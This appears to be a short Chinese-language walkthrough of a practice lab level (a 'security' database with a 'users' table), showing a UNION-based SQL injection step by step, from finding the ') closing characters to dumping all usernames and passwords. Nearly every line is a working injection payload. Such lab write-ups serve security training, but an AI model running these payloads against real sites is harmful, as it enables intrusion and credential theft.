0、初始页面
data:image/s3,"s3://crabby-images/0127c/0127c3275834a0fcaf7d013e0ebf0c2365969dd2" alt=""
1、确定闭合字符
确定为字符型注入
?id=1 and 1=1
?id=1 and 1=2
确定闭合字符为 ')
?id=1'
?id=1')
data:image/s3,"s3://crabby-images/4faa6/4faa6bb914f553f53837c4eeb019d10432a01d1c" alt=""
2、确定表的列数
确定查询表的列数为3
?id=1') order by 3 --+
data:image/s3,"s3://crabby-images/06558/0655873b9de04364cbb82fa1d834dc1d3c5fc039" alt=""
3、确定回显位置
确定回显位置为第二列和第三列
?id=-1') union select 1,2,3 --+
data:image/s3,"s3://crabby-images/08b8c/08b8ce5dfd607cd4e40a7d7fdd3878bf73d40a58" alt=""
4、爆库名
当前所在数据库为security
?id=-1') union select 1,user(),database() --+
data:image/s3,"s3://crabby-images/95f78/95f78abc010cdd93e65de08189c499672edee00b" alt=""
5、爆表名
查看users表
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+
data:image/s3,"s3://crabby-images/054dd/054dd102cf77df96abf6a41285e9803499dc2293" alt=""
6、爆列名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
7、显示最终结果
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
data:image/s3,"s3://crabby-images/42189/4218926cae8a29121a3cebeecdfe5dd2a7f7aacb" alt=""